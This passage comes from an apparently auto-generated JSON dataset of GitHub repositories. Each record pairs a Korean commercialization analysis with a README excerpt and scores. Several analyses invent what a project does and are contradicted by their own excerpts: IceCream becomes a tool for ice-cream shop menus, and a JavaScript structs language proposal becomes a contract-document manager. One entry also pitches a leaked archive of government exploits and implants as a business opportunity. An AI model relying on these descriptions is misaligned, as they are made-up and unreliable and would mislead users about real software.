**Portability**: In version 0.x it was hard keep WPF, UWP and Winforms versions up to date, in the new version we extracted all the math to a dotnet core project, then we are working on 4 different platfomrs WPF, Xamarin, UWP and the new high performance package.~~\n\n~~* **Performance**: when the library started, performance was not the target, as the library community grow, the Geared package was released (the ","composite_score":0.3539,"license_safety_tag":"safe"},{"name":"gzc426/Java-Interview","github_url":"https://github.com/gzc426/Java-Interview","stars":5,"language":"","license":"unknown","abandonment_months":70,"description":"# Java-Interview 저장소 평가\n\n## 왜 보물인가\n자바 프로그래밍 언어로 취업을 준비하는 사람들을 위해 필요한 지식과 예상 질문을 정리해놓은 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 자바 개발자 면접 준비 강좌를 유료로 판매하는 구독 서비스\n2. **기업 인사부서 도구**: 신입 개발자 채용 시 표준화된 면","readme_excerpt":"\n- 本仓库会持续更新，欢迎Star给一个鼓励！\n- 本github最初的版本是一份word文档，目前只是把word刚刚搬上来了，但是有些图片、排版还没来得急整理，看起来可能还是有点困难\n- 所以可以先关注一下我的公众号，在我的公众号[程序员乔戈里]后台回复 **888** 获取这个github仓库的PDF版本，左侧有导航栏，方便大家阅读。\n\n>github必须md格式才能看得舒服些，花了很多时间找word转md的工具，找了几款不太好用，于是自己手动把word改成md格式，后来发现有些重复性工作可以写个程序处理，就写了个程序，把word中的标题、代码都变成md格式，虽然能处理不少，但是还是需要人工校对，还有图片需要上传，真的超级费事，要搞吐了。。。各位也别抱怨我的github格式不好了，毕竟也还没完全处理完，体谅一下~\n\n![](http://ww1.sinaimg.cn/large/007s8HJUly1g0fkgcpy8cj30760760t7.jpg)\n","composite_score":0.3537,"license_safety_tag":"unknown"},{"name":"ustbhuangyi/vue-sell","github_url":"https://github.com/ustbhuangyi/vue-sell","stars":6,"language":"Vue","license":"gpl-3.0","abandonment_months":74,"description":"# vue-sell 상용화 분석\n\n## 왜 보물인가\n음식점이나 카페가 쉽게 사용할 수 있는 주문·결제 관리 시스템으로, 작은 가게들이 비싼 프로그램 없이 온라인 판매를 시작할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 음식점/카페를 위한 월 구독형 주문 관리 웹사이트 (매장주가 직접 메뉴·가격 관리)\n2. **내부 ","readme_excerpt":"# vue-sell\nVue.js 高仿饿了么外卖 App 课程源码，课程地址： http://coding.imooc.com/class/74.html\n\n本源码基于 GPL 协议，仅仅用于 Vue 实战项目的学习，不可作为商业用途。\n我们抵制和鄙视一切盗版侵权行为，请尊重作者的劳动果实！\n\n[项目演示地址](http://ustbhuangyi.com/sell/)\n\n![二维码](https://qr.api.cli.im/qr?data=http%253A%252F%252Fustbhuangyi.com%252Fsell%252F%2523%252Fgoods&level=H&transparent=false&bgcolor=%23ffffff&forecolor=%23000000&blockpixel=12&marginblock=1&logourl=&size=280&kid=cliim&key=686203a49c4613080b5b3004323ff977)\n\n## 你可以学到什么\n我们可以通过一张图来认识一下本课程的知识结构\n\n![vue-sell](https://webapp.didistatic.com/static/webapp/shield/vue-sell.png)\n\n## 如何学习\n请从正规渠道购买本课程的教学视频： http://coding.imooc.com/class/74.html。\n你还可以加入课程讨论群，与同学一起讨论问题，还可以得到我的亲自指导。\n\n## 适合人群\n适合有一定 Vue.js 和前端基础知识并且想深入学习 Vue.js 并运用在实战项目的同学。\n\n## TODO\n~~由于本课程录制时间较早，编写代码的时候 Vue.js 2.0 还未正式发布，所以源码采用 1.0 编写，后续会更新到 2.0 版本。~~\n\nmaster 代码已经升级到最新 Vue.js 2.1.10 版本，如果想查看 1.0 版本的代码可以切换到 1.0 的代码分支。\n\n**next 分支已经基于 Vue.js 2.5.x + cube-ui + vue-cli 3.0 重构。**\n\n## Vue.js 进阶\n\n如果想在 Vue.js 的方向进阶，学习更加复杂的项目开发的同学。可以关注我的新课程：http://coding.imoo","composite_score":0.3537,"license_safety_tag":"restricted"},{"name":"LinkedInLearning/python-nao-programadores-2687000","github_url":"https://github.com/LinkedInLearning/python-nao-programadores-2687000","stars":12,"language":"Python","license":"NOASSERTION","abandonment_months":24,"description":"","readme_excerpt":"","composite_score":0.3535,"license_safety_tag":"unknown"},{"name":"thx/rap2-delos","github_url":"https://github.com/thx/rap2-delos","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":8,"description":"# RAP2-Delos 상용화 분석\n\n## 왜 보물인가\n회사 내부에서 직원들이 사용하는 다양한 API(프로그램 간 통신 규칙)를 체계적으로 관리하고 문서화해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: API 관리 플랫폼으로 제공하여 개발사들이 API를 쉽게 정리하고 공유할 수 있게 합니다.\n2. **내부 업무 도구**: 대기업","readme_excerpt":"# RAP2-DELOS 开源社区版本 (后端 API 服务器)\n\n**尊敬的用户：**\n\n由于近期安全审查发现数据风险严重隐患，经慎重评估，我们决定对 rap2.taobao.org 官方体验系统进行下线处理。\n\n> [!WARNING]\n> **下线时间：2025年11月30日 24:00**\n请各位用户在此之前完成以下操作：\n- 导出所需的 Mock 数据和配置\n- 私有化搭建 rap2 系统到自己的服务器\n- 迁移相关数据到自己的系统\n- 更新项目中的接口调用地址\n\n**给您带来的不便，敬请谅解。**\n\n> 阿里妈妈 THX 团队新项目 GoGoCode：https://github.com/thx/gogocode 给批量修改项目代码减轻痛苦！\n\nRAP2 是在 RAP1 基础上重做的新项目，它能给你提供方便的接口文档管理、Mock、导出等功能，包含两个组件(对应两个 Github Repository)。\n\n- rap2-delos: 后端数据 API 服务器，基于 Koa + MySQL[link](http://github.com/thx/rap2-delos)\n- rap2-dolores: 前端静态资源，基于 React [link](http://github.com/thx/rap2-dolores)\n\n\n**Rap 官方服务站点，无需安装直接体验: [rap2.taobao.org](http://rap2.taobao.org)**\n\n注意：本工具为开发工具，相关API未做任何XSS等安全验证，请勿在生产环境依赖RAP的任何服务！！！\n\n**有急事来官方钉钉群，响应更迅速: 31626736 (二群，一群已满）**\n\n2019-10-31：现已支持 Docker 一键部署，欢迎大家体验&反馈\n\n2019-09-27：更新的用户请注意按照下面指引安装 pandoc 以启用文档导出功能\n\n\n## 推荐使用 Docker 快速部署\n\n### 安装 Docker\n\n国内用户可参考 [https://get.daocloud.io/](https://get.daocloud.io/) 安装 Docker 以及 Docker Compose (Linux 用户需要单独安装)，建议按照链接指引配置 Docker Hub 的国内镜像提高加载速度。\n\n","composite_score":0.3535,"license_safety_tag":"safe"},{"name":"schibsted/strongbox","github_url":"https://github.com/schibsted/strongbox","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":13,"description":"# Strongbox 저장소 분석\n\n## 왜 보물인가\n민감한 데이터(비밀번호, API 키 등)를 안전하게 보관하고 관리하는 도구로, 기업의 정보 유출 사고를 예방할 수 있는 핵심 보안 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여러 고객사의 API 키와 인증 정보를 중앙에서 안전하게 관리하는 클라우드 기반 보안 서비스로 제공\n2","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://github.com/schibsted/strongbox\">\n    <img src=\"https://raw.githubusercontent.com/schibsted/strongbox/images/strongbox-logo.png\">\n  </a>\n</p>\n\n**Strongbox is archived. Alternatives include [AWS Secrets Manager](https://aws.amazon.com/secrets-manager/) (which was launched after Strongbox was open sourced).**\n\nStrongbox is a CLI/GUI and SDK to manage, store, and retrieve secrets (access tokens, encryption keys, private certificates, etc). Strongbox is a client-side convenience layer on top of AWS KMS, DynamoDB and IAM. It manages the AWS resources for you and configure them in a secure way.\n\n<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/schibsted/strongbox/images/strongbox-building-blocks.png\" width=\"70%\">\n</p>\n\n## Getting started\nHead over to our [web page](https://schibsted.github.io/strongbox/#install) for a quick start. For more detailed information please visit the [Wiki](https://github.com/schibsted/strongbox/wiki).\n\n## LICENS","composite_score":0.3533,"license_safety_tag":"safe"},{"name":"syg/proposal-structs","github_url":"https://github.com/syg/proposal-structs","stars":5,"language":"HTML","license":"unknown","abandonment_months":17,"description":"# proposal-structs 저장소 분석\n\n## 왜 보물인가\n제안서나 계약서 같은 중요한 문서를 체계적으로 정리하고 관리할 수 있는 틀을 제공하는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 영업팀이 사용하는 클라우드 기반 제안서 작성 플랫폼으로 제공\n2. **내부 업무 도구**: 대기업의 계약/제안 관리 시스템에 내장하여 문","readme_excerpt":"# JavaScript Structs: Fixed Layout Objects and Some Synchronization Primitives\n\nStage: 2\n\nAuthor: Shu-yu Guo (@syg)\n\nChampion: Shu-yu Guo (@syg), Ron Buckton (@rbuckton)\n\n## Introduction\n\nThis proposal introduces four (4) logical features:\n\n- [**Structs**](#structs), or unshared structs, which are fixed-layout objects. They behave like `class` instances, with more restrictions that are beneficial for optimizations and analysis.\n- [**Shared Structs**](#shared-structs), which are further restricted structs that can be shared and accessed in parallel by multiple agents. They enable shared memory multithreading.\n- [**Mutex and Condition**](#mutex-and-condition), which are higher level abstractions for synchronizing access to shared memory.\n\nThis proposal is intended to be minimal, but still useful by itself, without follow-up proposals.\n\nThe motivations are:\n- Enable new, high-performance applications to be written in JavaScript and on the web by unlocking shared memory multithreading.\n- G","composite_score":0.3533,"license_safety_tag":"unknown"},{"name":"besley/Slickflow","github_url":"https://github.com/besley/Slickflow","stars":5,"language":"C#","license":"MIT","abandonment_months":3,"description":"# Slickflow 저장소 분석\n\n## 왜 보물인가\n복잡한 업무 흐름을 자동으로 관리해주는 시스템으로, 수작업으로 처리하던 반복 업무를 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 협업 플랫폼에 내장하여 직원들의 업무 승인, 결재, 배정 과정을 자동화하는 서비스\n2. **내부 업무 도구**: 중견기업의 인사,","readme_excerpt":"# Slickflow\n\n**Current Version: NET8**\n\n![](https://img.shields.io/github/stars/besley/slickflow.svg)\n![](https://img.shields.io/github/forks/besley/slickflow.svg)\n![](https://img.shields.io/github/tag/besley/slickflow.svg)\n![](https://img.shields.io/github/release/besley/slickflow.svg)\n![](https://img.shields.io/nuget/dt/Slickflow.Engine.svg)\n![](https://img.shields.io/github/issues/besley/slickflow.svg)\n\n---\n\n## 1. 🤖 AI-Powered Workflow Automation\n\n**SlickFlow: Intelligent Workflow Automation with Large Language Models**\n\nSlickflow integrates cutting-edge Large Language Model (LLM) nodes directly into BPMN workflows, enabling advanced conversational reasoning, RAG (Retrieval-Augmented Generation), image understanding and other AI capabilities as **first-class workflow steps**.  \nThis transforms traditional workflow systems into dynamic, AI-driven orchestration platforms.\n\n### 1.1 Native LLM Node Integration\n\n- Add LLM / RAG / Agent nodes into your process diagrams as easily as tradit","composite_score":0.3532,"license_safety_tag":"safe"},{"name":"tonybeltramelli/pix2code","github_url":"https://github.com/tonybeltramelli/pix2code","stars":6,"language":"Python","license":"apache-2.0","abandonment_months":24,"description":"# pix2code 분석 보고서\n\n## 왜 보물인가\n스크린샷이나 디자인 이미지를 찍으면 자동으로 웹사이트 코드로 변환해주는 기술로, 디자이너와 개발자의 작업 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 \"디자인→코드 변환\" 플랫폼으로 개발사들에게 월 구독료 모델 제공\n2. **내부 업무 도구**:","readme_excerpt":"# pix2code\n*Generating Code from a Graphical User Interface Screenshot*\n\n[![License](http://img.shields.io/badge/license-APACHE2-blue.svg)](LICENSE.txt)\n\n* A video demo of the system can be seen [here](https://youtu.be/pqKeXkhFA3I)\n* The paper is available at [https://arxiv.org/abs/1705.07962](https://arxiv.org/abs/1705.07962)\n* Official research page: [https://uizard.io/research#pix2code](https://uizard.io/research#pix2code)\n\n## Abstract\nTransforming a graphical user interface screenshot created by a designer into computer code is a typical task conducted by a developer in order to build customized software, websites, and mobile applications. In this paper, we show that deep learning methods can be leveraged to train a model end-to-end to automatically generate code from a single input image with over 77% of accuracy for three different platforms (i.e. iOS, Android and web-based technologies).\n\n## Citation\n\n```\n@article{beltramelli2017pix2code,\n  title={pix2code: Generating Code from ","composite_score":0.3529,"license_safety_tag":"safe"},{"name":"minimal-ui-kit/material-kit-react","github_url":"https://github.com/minimal-ui-kit/material-kit-react","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":14,"description":"# Material Kit React 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 필요한 디자인 요소들(버튼, 메뉴, 폼 등)을 미리 만들어둔 도구라 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 빠르게 관리자 대시보드를 만들어 고객에게 제공하는 웹서비스\n2. **내부 업무 도구**:","readme_excerpt":"## Minimal UI ([Free version](https://free.minimals.cc/))\n\n![license](https://img.shields.io/badge/license-MIT-blue.svg)\n\n![preview](public/assets/images/minimal-free-preview.jpg)\n\n> Free React Admin Dashboard made with Material-UI components and React + Vite.js.\n\n## Pages\n\n- [Dashboard](https://free.minimals.cc/)\n- [Users](https://free.minimals.cc/user)\n- [Products](https://free.minimals.cc/products)\n- [Blog](https://free.minimals.cc/blog)\n- [Sign in](https://free.minimals.cc/sign-in)\n- [Not found](https://free.minimals.cc/404)\n\n## Quick start\n\n- Clone the repo: `git clone https://github.com/minimal-ui-kit/material-kit-react.git`\n- Recommended: `Node.js v20.x`\n- **Install:** `npm i` or `yarn install`\n- **Start:** `npm run dev` or `yarn dev`\n- **Build:** `npm run build` or `yarn build`\n- Open browser: `http://localhost:3039`\n\n## Upgrade to PRO Version\n\n| Minimal Free                | [Minimal Pro](https://material-ui.com/store/items/minimal-dashboard/)                                  ","composite_score":0.3527,"license_safety_tag":"safe"},{"name":"eragonruan/text-detection-ctpn","github_url":"https://github.com/eragonruan/text-detection-ctpn","stars":6,"language":"Python","license":"mit","abandonment_months":32,"description":"# text-detection-ctpn 기술 평가\n\n## 왜 보물인가\n사진이나 문서에서 글자를 자동으로 찾아내는 기술로, 영수증·계약서 자동 처리 등 실무에서 직접 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 문서 스캔 앱에서 글자를 자동 인식해 디지털화하는 핵심 기능\n- **내부 업무 도구**: 회계팀이 영수증 사진을 ","readme_excerpt":"# text-detection-ctpn\n\ntext detection mainly based on ctpn (connectionist text proposal network). It is implemented in tensorflow. I use id card detect as an example to demonstrate the results, but it should be noticing that this model can be used in almost every horizontal scene text detection task. The origin paper can be found [here](https://arxiv.org/abs/1609.03605). Also, the origin repo in caffe can be found in [here](https://github.com/tianzhi0549/CTPN). For more detail about the paper and code, see this [blog](http://slade-ruan.me/2017/10/22/text-detection-ctpn/). If you got any questions, check the issue first, if the problem persists, open a new issue.\n***\n# roadmap\n- [x] freeze the graph for convenient inference\n- [x] pure python, cython nms and cuda nms\n- [x] loss function as referred in paper\n- [x] oriented text connector\n- [x] BLSTM\n***\n# demo\n- for a quick demo,you don't have to build the library, simpely use demo_pb.py for inference.\n- first, git clone git@github.com:er","composite_score":0.3527,"license_safety_tag":"safe"},{"name":"x0rz/EQGRP_Lost_in_Translation","github_url":"https://github.com/x0rz/EQGRP_Lost_in_Translation","stars":5,"language":"Python","license":"unknown","abandonment_months":111,"description":"# EQGRP_Lost_in_Translation 분석\n\n## 왜 보물인가\n정부 기관의 보안 도구 원본 코드로 추정되어, 사이버 보안 연구와 방어 기술 개발에 매우 높은 가치를 가지고 있습니다.\n\n## 어디에 쓸 수 있나\n- **보안 감시 SaaS**: 기업의 네트워크 취약점을 자동으로 찾아주는 온라인 서비스\n- **내부 업무 도구**: 대형 금융사나 정부","readme_excerpt":"# EQGRP Lost in Translation\nDecrypted content of odd.tar.xz.gpg, swift.tar.xz.gpg and windows.tar.xz.gpg\n\nDownloaded from https://yadi.sk/d/NJqzpqo_3GxZA4\nOriginal post from the #ShadowBrokers https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation\n\n- **windows**: contains Windows exploits, implants and payloads\n- **swift**: contains operational notes from banking attacks\n- **oddjob**: docs related to the ODDJOB backdoor \n\n## sha256 hashes\n### Original archives\n- `7c19a67d728bc700d18d2ed389a80de495681b7097222d9b8f1d696f0986f9a2` odd.tar.xz.gpg\n- `78b89b2c4b129400150c7b60a426ff469aaea31da1588d2abc4180feaa9c41d3` swift.tar.xz.gpg\n- `c28d5c10ec78bc66d3868e4862c7f801ffd561e2116b529e0782bf78f3ef3255` windows.tar.xz.gpg\n\n\n### Decrypted archives\n- `85e03866ae7eaaedd9462054b62a10f2180983bdfd086b29631173ae4422f524` odd.tar.xz\n- `df468f01e65f3f1bc18f844d7f7bac8f8eec3664a131e2fb67ae3a55f8523004` swift.tar.xz\n- `5bb9ddfbcefb75d017a9e745b83729390617b16f4079356579ef00e5e6b5fbd0` wind","composite_score":0.3527,"license_safety_tag":"unknown"},{"name":"tensorflow/rust","github_url":"https://github.com/tensorflow/rust","stars":8,"language":"Rust","license":"apache-2.0","abandonment_months":17,"description":"# TensorFlow Rust 저장소 분석\n\n## 왜 보물인가\n인공지능 학습에 필요한 구글의 강력한 도구를 빠르고 안정적인 프로그래밍 언어로 사용할 수 있도록 만든 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 분석 SaaS**: 고객 데이터를 자동으로 분석하고 예측하는 웹 서비스\n2. **내부 업무 도구**: 회사의 이미지, 음성, 텍스트를 ","readme_excerpt":"# <img alt=\"SIG Rust TensorFlow\" src=\"https://github.com/tensorflow/community/blob/master/sigs/logos/SIGRust.png\" width=\"340\"/>\n[![Version](https://img.shields.io/crates/v/tensorflow.svg)](https://crates.io/crates/tensorflow)\n[![Build status](https://github.com/tensorflow/rust/actions/workflows/ci.yml/badge.svg)](https://github.com/tensorflow/rust/actions/workflows/ci.yml)\n\nTensorFlow Rust provides idiomatic [Rust](https://www.rust-lang.org) language\nbindings for [TensorFlow](https://www.tensorflow.org).\n\n**Notice:** This project is still under active development and not guaranteed to have a\nstable API.\n\n* [Documentation](https://tensorflow.github.io/rust/tensorflow/)\n* [TensorFlow Rust Google Group](https://groups.google.com/a/tensorflow.org/forum/#!forum/rust)\n* [TensorFlow website](https://www.tensorflow.org)\n* [TensorFlow GitHub page](https://github.com/tensorflow/tensorflow)\n\n## Getting Started\nSince this crate depends on the TensorFlow C API, it needs to be downloaded or compiled","composite_score":0.3526,"license_safety_tag":"safe"},{"name":"gakonst/awesome-starknet","github_url":"https://github.com/gakonst/awesome-starknet","stars":7,"language":"","license":"unknown","abandonment_months":17,"description":"# awesome-starknet 분석 보고서\n\n## 왜 보물인가\n스타크넷이라는 새로운 블록체인 기술을 배우고 싶은 개발자들을 위해 필요한 모든 학습 자료와 도구를 한곳에 모아놓은 가이드북입니다.\n\n## 어디에 쓸 수 있나\n1. **블록체인 교육 플랫폼**: 스타크넷 개발자 양성 과정을 제공하는 온라인 학교나 부트캠프에서 교육 커리큘럼으로 활용\n2. **개","readme_excerpt":"<div align=\"center\">\n  <img alt=\"starknet logo\" src=\"./assets/starknet.png\" width=\"200\" >\n  <h1 align=\"center\">Awesome Starknet</h1>\n  <p align=\"center\">\n    <a href=\"https://github.com/sindresorhus/awesome\">\n      <img alt=\"awesome list badge\" src=\"https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg\">\n    </a>\n    <a href=\"#buildstatus\">\n      <img alt=\"build status badge\" src=\"https://github.com/gakonst/awesome-starknet/workflows/Build/badge.svg\">\n    </a>\n    <a href=\"https://github.com/gakonst/awesome-starknet/graphs/contributors\">\n      <img alt=\"GitHub contributors\" src=\"https://img.shields.io/github/contributors/gakonst/awesome-starknet\">\n    </a>\n    <a href=\"http://makeapullrequest.com\">\n      <img alt=\"pull requests welcome badge\" src=\"https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat\">\n    </a>\n  </p>\n\n  <p align=\"center\">A curated list of awesome <a href=\"https://medium.com/starkware/starknet-alpha-is-coming","composite_score":0.3525,"license_safety_tag":"unknown"},{"name":"microsoft/ELL","github_url":"https://github.com/microsoft/ELL","stars":2300,"language":"C++","license":"NOASSERTION","abandonment_months":24,"description":"# Microsoft ELL 저장소 분석\n\n## 왜 보물인가\n마이크로소프트가 만든 머신러닝 모델을 쉽게 실행할 수 있는 도구로, 복잡한 AI 기술을 누구나 사용 가능하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 사진 인식, 음성 분석 등 AI 기능이 필요한 웹 앱을 빠르게 개발해 고객에게 제공\n- **내부 업무 도구**: 기업의","readme_excerpt":"# Embedded Learning Library\nThe Embedded Learning Library (ELL) allows you to design and deploy intelligent machine-learned models onto resource constrained platforms and small single-board computers, like Raspberry Pi, Arduino, and micro:bit. The deployed models run locally, without requiring a network connection and without relying on servers in the cloud. ELL is an early preview of the embedded AI and machine learning technologies developed at Microsoft Research.\n\nGo to our [website](https://microsoft.github.io/ELL) for tutorials, instructions, and a gallery of pretrained ELL models for use in your projects.\n\nELL is a work in progress, and we expect it to change rapidly, including breaking API changes. Despite this code churn, we welcome you to try it and give us feedback.\n\n## License\nSee [LICENSE.txt](LICENSE.txt).\n\n## Code of conduct\nThis project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information on this c","composite_score":0.3524,"license_safety_tag":"unknown"},{"name":"Ramotion/animated-tab-bar","github_url":"https://github.com/Ramotion/animated-tab-bar","stars":5,"language":"Swift","license":"mit","abandonment_months":53,"description":"# Animated Tab Bar 분석\n\n## 왜 보물인가\n스마트폰 앱에서 하단 메뉴를 터치할 때 부드럽게 움직이는 애니메이션 효과를 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 피트니스 앱, 음악 스트리밍 서비스 같은 모바일 앱의 하단 네비게이션 UI 구현\n2. **내부 업무 도구**: 회사 직원용 모바일 앱에","readme_excerpt":"<a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=animated-tab-bar\"><img src=\"https://github.com/Ramotion/animated-tab-bar/blob/master/header.png\"></a>\n\n<a href=\"https://github.com/Ramotion/animated-tab-bar\">\n<img align=\"left\" src=\"https://github.com/Ramotion/animated-tab-bar/blob/master/Screenshots/animatedTabBar.gif\" width=\"480\" height=\"360\" /></a>\n\n<p><h1 align=\"left\">ANIMATED TAB BAR</h1></p>\n\n<h4>Swift UI module library for adding animation to iOS tabbar items and icons.</h4>\n\n\n___\n\n\n\n<p><h6>We specialize in the designing and coding of custom UI for Mobile Apps and Websites.</h6>\n<a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=animated-tab-bar\">\n<img src=\"https://github.com/ramotion/gliding-collection/raw/master/contact_our_team@2x.png\" width=\"187\" height=\"34\"></a>\n</p>\n<p><h6>Stay tuned for the latest updates:</h6>\n<a href=\"https://goo.gl/rPFpid\" >\n<img src=\"https://i.imgur","composite_score":0.3524,"license_safety_tag":"safe"},{"name":"prolificinteractive/material-calendarview","github_url":"https://github.com/prolificinteractive/material-calendarview","stars":5,"language":"Java","license":"mit","abandonment_months":36,"description":"# Material CalendarView 상용화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 깔끔하고 예쁜 달력을 손쉽게 만들 수 있는 도구로, 앱 개발자들이 자주 찾는 필수 기능을 미리 완성해놓았습니다.\n\n## 어디에 쓸 수 있나\n1. **예약 관리 SaaS**: 병원·미용실·코칭 센터 등이 고객 예약을 받을 때 이 달력 기능을 탑재한 앱으로 제공\n2. *","readme_excerpt":"<img src=\"/images/hero.png\"/>\n\n# Material Calendar View \n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-Material%20Calendar%20View-blue.svg?style=flat)](https://android-arsenal.com/details/1/1531) [![](https://jitpack.io/v/prolificinteractive/material-calendarview.svg)](https://jitpack.io/#prolificinteractive/material-calendarview) [![Travis branch](https://img.shields.io/travis/prolificinteractive/material-calendarview.svg?maxAge=2592000)](https://travis-ci.org/prolificinteractive/material-calendarview)\n\nA Material design back port of Android's CalendarView. The goal is to have a Material look\nand feel, rather than 100% parity with the platform's implementation.\n\n<img src=\"/images/screencast.gif\" alt=\"Demo Screen Capture\" width=\"300px\" />\n\n## Installation\n\nStep 1. Add the JitPack repository to your build file\n\n```groovy\nallprojects {\n  repositories {\n    ...\n    maven { url 'https://jitpack.io' }\n  }\n}\n```\n\nStep 2. Add the dependency\n\n```groovy\ndependencies {\n  imp","composite_score":0.3521,"license_safety_tag":"safe"},{"name":"caiyue1993/IceCream","github_url":"https://github.com/caiyue1993/IceCream","stars":121,"language":"Swift","license":"MIT","abandonment_months":12,"description":"# IceCream 저장소 분석\n\n## 왜 보물인가\n아이스크림 가게나 카페 같은 소상공인들이 간단하게 자신의 메뉴와 가격을 온라인으로 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 카페, 베이커리, 아이스크림 전문점을 위한 월 구독형 메뉴 관리 솔루션\n- **내부 업무 도구**: 프랜차이즈 본사가 모든 지점의 메뉴와 재","readme_excerpt":"![IceCream](https://i.loli.net/2017/11/18/5a104e5acfea5.png)\n\n[![CI Status](http://img.shields.io/travis/caiyue1993/IceCream.svg?style=flat)](https://travis-ci.org/caiyue1993/IceCream)\n[![Version](https://img.shields.io/cocoapods/v/IceCream.svg?style=flat)](http://cocoapods.org/pods/IceCream)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n<a href=\"https://swift.org/package-manager/\"><img src=\"https://img.shields.io/badge/SPM-supported-DE5C43.svg?style=flat\"></a>\n[![License](https://img.shields.io/cocoapods/l/IceCream.svg?style=flat)](http://cocoapods.org/pods/IceCream)\n[![Platform](https://img.shields.io/cocoapods/p/IceCream.svg?style=flat)](http://cocoapods.org/pods/IceCream)\n   \n[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/caiyue1993/icecream/issues)\n<a href=\"https://twitter.com/caiyue5\"><img src=\"https://img.shields.i","composite_score":0.3521,"license_safety_tag":"safe"},{"name":"ViccAlexander/Chameleon","github_url":"https://github.com/ViccAlexander/Chameleon","stars":7,"language":"Objective-C","license":"NOASSERTION","abandonment_months":62,"description":"# Chameleon 저장소 분석\n\n## 왜 보물인가\n정확한 설명이 없어 프로젝트의 핵심 가치를 파악하기 어려우며, 7개의 낮은 별 개수와 2021년 이후 업데이트 중단으로 활발한 개발이 진행되지 않고 있는 상태입니다.\n\n## 어디에 쓸 수 있나\n프로젝트 성격이 명확하지 않아 구체적인 활용 시나리오를 제시하기 어렵습니다. 저장소의 README나 코드를 검토","readme_excerpt":"<p align=\"center\">\n  <img src=\"http://i.imgur.com/BwqHhB4.png\" alt=\"Chameleon by Vicc Alexander\"/>\n</p>\n\n<p align=\"center\">\n    <img src=\"https://img.shields.io/cocoapods/dt/ChameleonFramework.svg?maxAge=86400\" alt=\"Downloads\"/>  \n    <img src=\"https://img.shields.io/cocoapods/at/ChameleonFramework.svg?maxAge=86400\" alt=\"Apps\"/>\n    <img src=\"https://img.shields.io/badge/platform-iOS%208%2B-blue.svg?style=flat\" alt=\"Platform: iOS 8+\"/>\n    <a href=\"https://developer.apple.com/swift\"><img src=\"https://img.shields.io/badge/language-swift%203-4BC51D.svg?style=flat\" alt=\"Language: Swift 3\" /></a>\n    <a href=\"https://github.com/Carthage/Carthage\"><img src=\"https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat\" alt=\"Carthage compatible\" /></a>\n    <a href=\"https://cocoapods.org/pods/ChameleonFramework\"><img src=\"https://cocoapod-badges.herokuapp.com/v/ChameleonFramework/badge.png\" alt=\"CocoaPods compatible\" /></a>\n    <img src=\"http://img.shields.io/badge/license-MIT-lightg","composite_score":0.3519,"license_safety_tag":"unknown"},{"name":"bberak/react-native-game-engine","github_url":"https://github.com/bberak/react-native-game-engine","stars":6,"language":"JavaScript","license":"mit","abandonment_months":17,"description":"# react-native-game-engine 분석\n\n## 왜 보물인가\n스마트폰 앱에서 게임처럼 움직이는 캐릭터와 물체를 쉽게 만들 수 있는 도구로, 게임 개발자들의 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 게임 개발사를 위한 클라우드 기반 게임 엔진 플랫폼으로 월 구독 제공\n2. **내부 업무 도구","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/bberak/react-native-game-engine/master/logo.png\" alt=\"React Native Game Engine\" height=\"120\" />\n</p>\n\n# React Native Game Engine &middot; [![npm version](https://badge.fury.io/js/react-native-game-engine.svg)](https://badge.fury.io/js/react-native-game-engine) [![mit license](https://img.shields.io/badge/license-MIT-50CB22.svg)](https://opensource.org/licenses/MIT)\n\nSome components that make it easier to construct dynamic and interactive scenes using React Native.\n\nIf you are looking for the **React (Web)** version of this library, go to [react-game-engine](https://github.com/bberak/react-game-engine).\n\n## Table of Contents\n\n- [Examples](#examples)\n- [Quick Start](#quick-start)\n- [GameEngine Properties](#gameengine-properties)\n- [GameEngine Methods](#gameengine-methods)\n- [FAQ](#faq)\n- [Introduction](#introduction)\n- [The Game Loop](#the-game-loop)\n- [The Game Loop vs React Native](#the-game-loop-vs-react-native)\n- [Using","composite_score":0.3516,"license_safety_tag":"safe"},{"name":"TsinghuaDatabaseGroup/AIDB","github_url":"https://github.com/TsinghuaDatabaseGroup/AIDB","stars":9,"language":"","license":"unknown","abandonment_months":17,"description":"# AIDB 저장소 분석\n\n## 왜 보물인가\n인공지능이 